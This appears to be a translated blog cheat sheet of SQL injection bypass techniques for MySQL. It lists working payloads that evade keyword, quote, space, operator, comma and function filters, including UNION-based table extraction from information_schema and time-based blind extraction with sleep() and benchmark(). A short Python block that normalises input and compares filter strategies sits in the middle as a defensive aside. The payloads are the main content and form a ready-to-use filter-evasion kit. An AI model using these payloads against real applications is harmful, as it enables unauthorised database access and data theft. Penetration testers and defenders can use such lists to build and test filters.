SQL Injection Bypass Methods: Contents
- SQL injection bypass methods
- I. Bypassing keywords
- II. Bypassing quotes
- III. Bypassing spaces
- IV. Bypassing logical operators
- V. Bypassing the equals sign
- VI. Bypassing greater-than, less-than and equals
- VII. Bypassing commas
- VIII. Bypassing functions
References:
https://blog.csdn.net/zizizizizi_/article/details/124094197
http://wed.xjx100.cn/news/143416.html?action=onClick
I. Bypassing keywords
1. Case variation
Example:
-1' UniOn SelEct 1,2#
2. Double-writing keywords
Example:
-1' uniunionon seselectlect 1,2#
3. URL encoding
Example:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
?id=-1'+union+select+1%2C2%23
URL-decoded: ?id=-1' union select 1,2#
4. Inline comments
Example:
-1' /*!union*/ /*!select*/ 1,2#
II. Bypassing quotes
1. Hex encoding
Example:
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#
2. URL encoding
Example:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
URL-decoded: ?id=-1' union select 1,2#
3. ASCII encoding (CHAR())
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#
4. Wide-byte (multibyte) bypass
-1%df' union select 1,2--+
III. Bypassing spaces
1. Comment sequences
Example:
-1'/**/union/**/select/**/1,2#
2. Inline comments
-1'/*!*/union/*!*/select/*!*/1,2#
3. Parentheses
-1' union(select(1),(2))#
4. Tab characters
-1'	union	select	1,2#
(the separators are tab characters)
5. Two spaces
-1'  union  select  1,2#
(the separators are two consecutive spaces)
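As an added, defensive illustration (not code from the original post): the canonicaliser below shows why a keyword blacklist has to normalise input before matching. It folds the case, URL-encoding, inline-comment and whitespace variants from sections I and III back to the same string, and contrasts single-pass keyword deletion, which the double-writing trick defeats, with deletion repeated to a fixed point. The sample payloads are copied from this page; the function names and the filter logic are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed test corpus: the keyword and whitespace payloads from sections I and III above.
SAMPLES = [
    "-1' UniOn SelEct 1,2#",                       # mixed case
    "-1' uniunionon seselectlect 1,2#",            # doubled keywords
    "%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23",  # URL-encoded
    "-1' /*!union*/ /*!select*/ 1,2#",             # MySQL inline comments
    "-1'/**/union/**/select/**/1,2#",              # comments in place of spaces
    "-1'\tunion\tselect\t1,2#",                    # tabs in place of spaces
]
KEYWORDS = ("union", "select")

def normalize(s: str, rounds: int = 3) -> str:
    """Canonicalise the input into the form the database engine effectively parses."""
    for _ in range(rounds):                  # undo URL encoding, even if applied more than once
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r"\1", s, flags=re.S)  # MySQL executes the body of /*!...*/
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)          # ordinary comments act as whitespace
    s = re.sub(r"\s+", " ", s)                           # tabs, newlines, runs of spaces -> one space
    return s.lower().strip()

def strip_once(s: str) -> str:
    """The broken filter that double-writing targets: delete each keyword a single time."""
    for kw in KEYWORDS:
        s = s.replace(kw, "")
    return s

def strip_to_fixpoint(s: str) -> str:
    """Repeat deletion until nothing changes, so the halves of 'uniunionon' cannot re-form 'union'."""
    prev = None
    while prev != s:
        prev, s = s, strip_once(s)
    return s

def keywords_present(s: str) -> list:
    """Keywords still visible after canonicalisation (substring match, so doubled forms are caught)."""
    n = normalize(s)
    return [kw for kw in KEYWORDS if kw in n]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(repr(raw), "->", repr(normalize(raw)), keywords_present(raw))
    print("single pass:", repr(strip_once(SAMPLES[1])), "| fixpoint:", repr(strip_to_fixpoint(SAMPLES[1])))
```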
IV. Bypassing logical operators
1. Replacing and
1' & 1=1#
1' && 1=1#
2. Replacing or
1' || 1=1#
3. Replacing not
1' and 1!=2#
V. Bypassing the equals sign
Original form
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1. like
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#
2. rlike
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema rlike database()#
3. regexp
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema regexp database()#
4. Not-equal operator (<>)
-1' union select 1,group_concat(table_name) from information_schema.tables where !(table_schema<>database())#
VI. Bypassing greater-than, less-than and equals
Original form
1' and if(ascii(substr(database(),1,1))>100,sleep(2),0)#
1. greatest / least
greatest(n1, n2, n3, …): returns the largest of its arguments
1' and if(greatest(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
least(n1, n2, n3, …): returns the smallest of its arguments
1' and if(least(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#
2. strcmp
strcmp(str1, str2): returns 0 if the strings are identical, -1 if the first argument sorts before the second under the current collation, and 1 otherwise
1' and if(strcmp(ascii(substr(database(),1,1)),100)=0,sleep(2),0)#
3. The in keyword
1' and if(ascii(substr(database(),1,1)) in (100),sleep(2),0)#
or:
1' and if(substr(database(),1,1) in ("d"),sleep(2),0)#
4. between … and …
1' and if(ascii(substr(database(),1,1)) between 90 and 100,sleep(2),0)#
5. like
1' and if(substr(database(),1,1) like "d%",sleep(2),0)#
VII. Bypassing commas
1. substr(str from pos for len), where a substring of length len is read starting at position pos
1' and if(ascii(substr(database() from 1 for 1))=100,sleep(2),0)#
2. The join keyword
-1' union select * from (select 1)a join (select 2)b#
3. The like keyword
1' and if(database() like "%d%",sleep(2),0)#
4. The offset keyword
1' union select 1,2 limit 1 offset 0#
equivalent to:
1' union select 1,2 limit 0,1#
VIII. Bypassing functions
1. Replacing sleep()
(1) benchmark()
benchmark(): the first argument is the number of times to execute, the second is the expression to execute
1' and benchmark(1000000000,1)#
2. Replacing ascii()
(1) bin()
bin(): converts to a binary number
1' and if(bin(ascii(substr(database(),1,1)))=1100100,sleep(2),1)#
(2) hex()
hex(): converts to a hexadecimal number
1' and if(hex(substr(database(),1,1))=64,sleep(2),1)#
(3) ord()
ord(): returns the character code of the leftmost character of the given string
1' and if(ord(substr(database(),1,1))=100,sleep(2),1)#
3. Replacing group_concat()
(1) concat_ws()
concat_ws(separator, str1, str2):
-1' union select 1,concat_ws(",","@",table_name) from information_schema.tables where table_schema=database()#
(2) concat()
concat():
-1' union select 1,concat(table_name) from information_schema.tables where table_schema=database()#
4. Replacing substr()
(1) substring()
substring(str, pos, len):
1' and if(substring(database(),1,1)="d",sleep(2),1)#
(2) mid()
mid(str, pos, len):
1' and if(mid(database(),1,1)="d",sleep(2),1)#
(3) left()
left(str, len):
1' and if(left(database(),1)="d",sleep(2),1)#
(4) right()
right(str, len):
1' and if(right(database(),1)="a",sleep(2),1)#